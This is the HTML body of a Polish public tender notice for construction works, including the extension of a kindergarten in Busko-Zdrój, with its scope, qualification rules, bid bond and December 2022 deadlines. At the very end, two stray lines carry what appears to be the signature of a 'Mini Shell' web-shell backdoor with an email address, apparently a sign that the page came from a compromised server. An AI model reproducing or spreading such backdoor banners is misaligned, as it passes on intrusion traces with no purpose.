<p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">6.	Zamawiający przewiduje udzielanie zamówień powtarzających.<br/>1)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót podobnych do robót stanowiących przedmiot niniejszego zamówienia.<br/>2)	Zamówienia, o których mowa w ust. 6 pkt 1 będą polegały na powtórzeniu robót zgodnych <br/>z zakresem robót stanowiącymi przedmiot niniejszego zamówienia. Zakresem robót stanowiących przedmiot zamówień, o których mowa w ust. 6 pkt 1 będą prace z zakresu:<br/><br/>Część 1:<br/>Roboty budowlane<br/>Roboty w zakresie burzenia<br/>Roboty w zakresie stolarki budowlanej<br/>Instalowanie stolarki metalowej z wyjątkiem drzwi i okien<br/>Roboty przy wznoszeniu rusztowań<br/>Roboty elewacyjne<br/>Izolacja cieplna<br/>Tynkowanie<br/>Roboty wykończeniowe w zakresie obiektów budowlanych<br/>Roboty instalacyjne w zakresie urządzeń sanitarnych<br/>Roboty instalacyjne hydrauliczne<br/>Instalowanie centralnego ogrzewania<br/><br/>Szczegółowy opis technologii wykonywania tych robót określa dokumentacja projektowa, a w przypadku wykonania tego zakresu w innej technologii normy krajowe i europejskie odnoszące się do tych robót. Zakres rzeczowy robót stanowiących przedmiot zamówień, o których mowa w pkt 1 nie przekroczy wartości 50 % wartości niniejszego zamówienia.<br/>3)	Zamówienia, o których mowa w pkt 1 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki, a jeżeli wartość szacunkowa będzie mniejsza od kwoty o której mowa w art. 2 ust.1 pkt 1 ustawy <br/>Pzp tylko po przeprowadzeniu negocjacji.<br/>4)	Zamówienia, o których mowa w pkt 1 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, zmiana technologii lub wprowadzenia zakresu dodatkowego w przypadku konieczności dokonania zmian w dokumentacji projektowej oraz gdy wystąpi potrzeba wykonania dodatkowego zakresu po dokonanym odbiorze końcowym. <br/>5)	Zamówienie o którym mowa w pkt 1 może obejmować rodzajowo cały lub częściowy zakres robót wskazanych w pkt. 2.<br/>6)	Do wyceny zakresu robót będą stosowane czynniki cenotwórcze z wyceny przedmiotu zamówienia niniejszego postępowania, a ceny materiałów i robocizny będą odpowiadały średnim cenom z ostatniego kwartału przed udzieleniem zamówienia dla rynku województwa realizacji przedmiotu zamówienia w oparciu o udokumentowane cenniki branżowe np.; SEKOCENBUD lub udokumentowane ceny z trzech hurtowni branżowych zaakceptowanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużony okres udzielonej gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Rozbudowa, nadbudowa Publicznego Przedszkola Nr 3 w Busku-Zdroju <br/>z zagospodarowaniem terenu wokół budynku obejmuje:<br/><br/>a) zagospodarowanie terenu działki nr 130:<br/>- wycinka wszystkich drzew i krzewów (w tym żywopłotów rosnących w skupiskach) kolidujących z inwestycją wraz z wykonaniem nowych nasadzeń,<br/>- rozbiórka istniejącej kostki kolidującej z inwestycją oraz wykonanie nowych ciągów komunikacyjnych z kostki brukowej betonowej na podsypce cementowo-piaskowej,<br/>- likwidacja schodów zewnętrznych,<br/>- wykonanie zagospodarowania terenu (po uprzednim oczyszczeniu terenu z resztek budowlanych) poprzez formowanie skarp oraz utworzenie powierzchni biologicznie czynnej (wykonanie trawników parkowych oraz rozrzucenie kory),<br/>- rozbiórka istniejącego ogrodzenia wokół działki nr 130 (przęsła, słupki, brama wjazdowa, furtki, podmurówka), wykonanie nowej podmurówki betonowej, montaż nowego ogrodzenia: ogrodzenie panelowe wraz z wymianą furtek i bramy wjazdowej,<br/>- modernizacja istniejącego placu zabaw o powierzchni ok.390m2 (rozbiórka istniejącego placu zabaw wraz z utylizacją urządzeń zabawowych, wymiana nawierzchni na nawierzchnię bezpieczną, syntetyczną, gumową oraz wymiana urządzeń placu zabaw na nowe elementy)<br/><br/>b) roboty budowlane polegające na dobudowaniu zachodniego skrzydła przedszkola <br/>o 2 kondygnacjach, nadbudowie i zmianie poddaszy nieużytkowych na pełną kondygnację w 2 częściach istniejącego budynku, budowie łącznika pomiędzy częścią istniejącą i nową:<br/>- wymiana pokrycia oraz konstrukcji dachu istniejącego wraz z ociepleniem stropu poddasza wełną mineralną,<br/>- elementy konstrukcyjne: fundamenty – ławy żelbetowe, ściany zewnętrzne – żelbetowe i murowane z pustaków ceramicznych, stropy – żelbetowe wylewane na budowie i z płyt kanałowych strunobetonowych prefabrykowanych, dach – drewniany, płatwiowo-kleszczowy oparty na płatwiach i ścianach zewnętrznych, stropodach - wykończenie papą, schody wewnętrzne – żelbetowe; wyłaz na strych ze schodami; nadproża – wylewane na budowie, żelbetowe.<br/>- wykończenie zewnętrzne: stolarka - PCV, aluminiowa, okna przeciwpożarowe; ściany - tynk mineralny, cokół – tynk mozaikowy, dach – blacha cynkowo-tytanowa, rynny i rury spustowe – ukryte w linii okapu, wpusty zabezpieczone koszem, rury spustowe ukryte w grubości ocieplenia; zadaszenie wejść – szkło bezpieczne, system na odciągach ze stali nierdzewnej<br/> - wykończenie wewnętrzne: podłogi i posadzki – parkiet, wykładzina PCV, płytki podłogowe; ściany – tynki gipsowe i cementowo-wapienne, płytki ceramiczne, okładziny ochronne przeciwuderzeniowe z tworzywa na bazie żywic akrylo-winylowych; malowanie – farby lateksowe, sufity podwieszane – systemowe, modułowe; stolarka i ślusarka wewnętrzna – drzwi drewnopochodne , łazienkowe z otworami wentylacyjnymi i aluminiowe, <br/>- wyposażenie dodatkowe: osłony grzejników, wycieraczki przed wejściami do budynku, scena podniesiona w świetlicy, systemowe kabiny sanitarne w toaletach, gaśnice, rolety EI 30 w istniejących oknach podawczych, lustra w łazienkach<br/>- wykonanie szybu windowego oraz montaż dźwigu osobowego: o wymiarach ok.1,1x1,4m, udźwig 630 kg (8 osób) <br/>- wykonanie wokół budynku opaski z kostki brukowej z obrzeżem betonowym,<br/> - wykonanie drenażu opaskowego z rur drenarskich, przy zastosowaniu geowłókniny, montaż studzienek kanalizacyjnych systemowych, obsypanie żwirem,<br/><br/>c) instalacje wewnętrzne (wraz z montażem osprzętu i armatury)<br/>- elektryczna, w tym oświetlenia ogólnego, awaryjnego, zasilania gniazd wtykowych 1-faz, oddymiania klatki schodowej; systemu sygnalizacji pożarowej; uziemienie, połączenia ochronne i wyrównawcze; instalacja odgromowa, ochrona przeciwprzepięciowa , przeciwporażeniowa<br/>- instalacja systemu sygnalizacji pożarowej<br/>- teletechniczna (instalacja okablowania strukturalnego) oraz system wideodomofonowy <br/>- wodno-kanalizacyjna <br/>- centralnego ogrzewania<br/>- hydrantowa<br/>- wentylacji mechanicznej nawiewno-wywiewnej <br/>- gazu <br/>- kanalizacji deszczowej<br/><br/>d) oprawy oświetleniowe: kaseton, konfigurowalny splot średniej wielkości, oprawy liniowe, oprawy przemysłowe, płaskie plafony, oprawy naścienne do oświetlenia awaryjnego-kierunkowego, dwustronne oprawy nastropowe do oświetlenia awaryjnego-kierunkowego, oprawy dostropowe i nastropowe do oświetlenia awaryjnego-ewakuacyjnego i antypanicznego.<br/><br/>e) wyposażenie budynku:<br/>- wyposażenie łazienek: umywalki ceramiczne, misy sedesowe, prysznice, dozowniki mydła, pojemniki na ręczniki papierowe, kosze na śmieci, pojemniki na papier toaletowy, lustra nad umywalkami, <br/>- umeblowanie sali dydaktycznych, pokoju logopedy, sali multimedialnej, pomieszczenia socjalnego,<br/>- wyposażenie sal dydaktycznych: pomoce dydaktyczne, zabawki<br/><br/>f) przebudowa istniejącego przyłącza gazu niskiego ciśnienia:<br/>- demontaż istniejącego gazociągu,<br/>- roboty montażowe nowego gazociągu wraz z przeprowadzeniem odbioru przez zarządcę sieci<br/><br/>g) wykonanie przyłącza kanalizacji sanitarnej dla budynku <br/><br/>h) przebudowa przyłącza kanalizacji deszczowej;<br/>- demontaż istniejącego przyłącza<br/>- roboty montażowe : studnie rewizyjne o średnicy 1200mm, kanały z rur PVC-U o średnicy zew. 200mm<br/><br/>i) oznakowanie znakami ewakuacyjnymi wszystkich dróg i wyjść ewakuacyjnych z budynku wraz z montażem niezbędnej ilości gaśnic p.poż. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">31530000-0 - Części lamp i sprzętu oświetleniowego</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">6.	Zamawiający przewiduje udzielanie zamówień powtarzających.<br/>1)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót podobnych do robót stanowiących przedmiot niniejszego zamówienia.<br/>2)	Zamówienia, o których mowa w ust. 6 pkt 1 będą polegały na powtórzeniu robót zgodnych <br/>z zakresem robót stanowiącymi przedmiot niniejszego zamówienia. Zakresem robót stanowiących przedmiot zamówień, o których mowa w ust. 6 pkt 1 będą prace z zakresu:<br/><br/>Część 2: <br/> Roboty w zakresie zagospodarowania terenu<br/>Roboty budowlane<br/> Roboty budowlane wykończeniowe, pozostałe<br/> Części lamp i sprzętu oświetleniowego<br/>Roboty instalacyjne w zakresie urządzeń sanitarnych<br/>Roboty instalacyjne hydrauliczne<br/>Instalowanie centralnego ogrzewania<br/><br/>Szczegółowy opis technologii wykonywania tych robót określa dokumentacja projektowa, a w przypadku wykonania tego zakresu w innej technologii normy krajowe i europejskie odnoszące się do tych robót. Zakres rzeczowy robót stanowiących przedmiot zamówień, o których mowa w pkt 1 nie przekroczy wartości 50 % wartości niniejszego zamówienia.<br/>3)	Zamówienia, o których mowa w pkt 1 będą udzielane po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki, a jeżeli wartość szacunkowa będzie mniejsza od kwoty o której mowa w art. 2 ust.1 pkt 1 ustawy <br/>Pzp tylko po przeprowadzeniu negocjacji.<br/>4)	Zamówienia, o których mowa w pkt 1 będą udzielane w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, zmiana technologii lub wprowadzenia zakresu dodatkowego w przypadku konieczności dokonania zmian w dokumentacji projektowej oraz gdy wystąpi potrzeba wykonania dodatkowego zakresu po dokonanym odbiorze końcowym. <br/>5)	Zamówienie o którym mowa w pkt 1 może obejmować rodzajowo cały lub częściowy zakres robót wskazanych w pkt. 2.<br/>6)	Do wyceny zakresu robót będą stosowane czynniki cenotwórcze z wyceny przedmiotu zamówienia niniejszego postępowania, a ceny materiałów i robocizny będą odpowiadały średnim cenom z ostatniego kwartału przed udzieleniem zamówienia dla rynku województwa realizacji przedmiotu zamówienia w oparciu o udokumentowane cenniki branżowe np.; SEKOCENBUD <br/>lub udokumentowane ceny z trzech hurtowni branżowych zaakceptowanych przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużony okres udzielonej gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych w zakresie:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu.<br/>4.	Zdolność techniczna lub zawodowa: <br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych w zakresie:<br/>1)	wykonanych robót.<br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz robót budowlanych wykonanych <br/>nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, <br/>czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; <br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w tym okresie wykonał:<br/>Część 1:<br/>minimum jedną robotę budowlaną zrealizowaną w ramach jednego kontraktu/umowy polegającą na budowie lub przebudowie lub rozbudowie lub remoncie lub termomodernizacji budynku/ budynków o wartości nie mniejszej niż 1 000 000,00 zł brutto.<br/><br/>Część 2:<br/>minimum jedną robotę budowlaną zrealizowaną w ramach jednego kontraktu/umowy polegającą na budowie lub przebudowie lub rozbudowie lub remoncie lub termomodernizacji budynku/ budynków o wartości nie mniejszej niż 4 000 000,00 zł brutto.<br/><br/>UWAGA!<br/>W przypadku składania oferty na więcej niż jedną część Wykonawca może wykazać się jedną robotą na części, na które składa ofertę, jeżeli wartość tej roboty odpowiada sumarycznej wartości opisanego warunku dla części, na które Wykonawca składa ofertę (np. wartość roboty dla części 1 i 2 to minimum 5 000 000,00 zł brutto).<br/><br/>Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty.<br/><br/>2)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.<br/>Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych <br/>za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez <br/>nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje <br/>n/w osobami:<br/><br/>Część 1:<br/>−	Kierownikiem budowy posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej i doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót przy co najmniej jednej zakończonej inwestycji wykonanej w ramach jednego kontraktu/umowy związanego/ej z budową <br/>lub rozbudową lub przebudową lub remontem budynku o wartości nie mniejszej <br/>niż 1 000 000,00 zł brutto.<br/>−	Kierownikiem robót posiadającym uprawnienia do kierowania robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych<br/>i elektroenergetycznych,<br/>−	Kierownikiem robót posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/><br/> Część 2: <br/>− Kierownikiem budowy posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń i doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót przy co najmniej jednej zakończonej inwestycji wykonanej w ramach jednego kontraktu/umowy związanego/ej z budową <br/>lub rozbudową lub przebudową lub remontem budynku o wartości nie mniejszej <br/>niż 4 000 000,00 zł brutto.<br/>−	Kierownikiem robót posiadającym uprawnienia do kierowania robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych<br/>i elektroenergetycznych,<br/>−	Kierownikiem robót posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych<br/><br/>Uwaga: Nie dopuszcza się wykazania tymi samymi osobami w każdej z części. <br/><br/>Do wykazu osób należy dołączyć oświadczenie Wykonawcy, że zaproponowana osoba posiada wymagane uprawnienia i przynależy do właściwej izby samorządu zawodowego, jeżeli taki wymóg na tą osobę nakłada Prawo budowlane.<br/><br/>Zgodnie z art. 12 a Prawa budowlanego który to odsyła do ustawy z dnia 22 grudnia <br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2020 r. poz. 220) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji <br/>w budownictwie nie jest wymagana przynależność do izby samorządu zawodowego.<br/><br/>5.	Sytuacja ekonomiczna i finansowa:<br/><br/>W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Zamawiający żąda złożenia następujących podmiotowych środków dowodowych:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie dokona oceny spełnienia warunków udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga przedstawienia podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Wykaz wykonanych robót potwierdzający opisany warunek wraz z dowodami potwierdzającymi należyte wykonanie tych robót.<br/>2)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z oświadczeniem o posiadanych uprawnieniach.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wadium w wysokości: <br/>Część nr 1: 20 000,00 zł (słownie: dwadzieścia tysięcy złotych 00/100.)<br/>Część nr 2: 90 000,00 zł (słownie: dziewięćdziesiąt tysięcy złotych 00/100 )<br/>należy wnieść przed upływem terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	W przypadku wnoszenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze (konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo zamówień publicznych, w tym:<br/>1)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie <br/>z art. 58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub pełnomocnictwo do reprezentowania <br/>w postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie w ofercie dokumentu zawierającego pełnomocnictwo w celu ustalenia podmiotu uprawnionego do występowania w imieniu Wykonawców w sposób umożliwiający ich identyfikację.<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika jaki zakres rzeczowy zamówienia realizować zamierzają poszczególni Wykonawcy.<br/>3)	W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia <br/>w rozdziale VI wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie dokumentów dla każdego konsorcjanta oddzielnie.<br/>2.	W odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający wymaga aby:<br/>1)	Doświadczeniem, o którym mowa w rozdziale V ust. 4 pkt 1 SWZ - w zakresie wykonanych robót wykazał się konsorcjant, który będzie wykonywał kluczowy zakres robót.<br/>2)	Pozostałe warunku udziału w postępowaniu podlegają sumowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami rozdziału XXII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-19 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com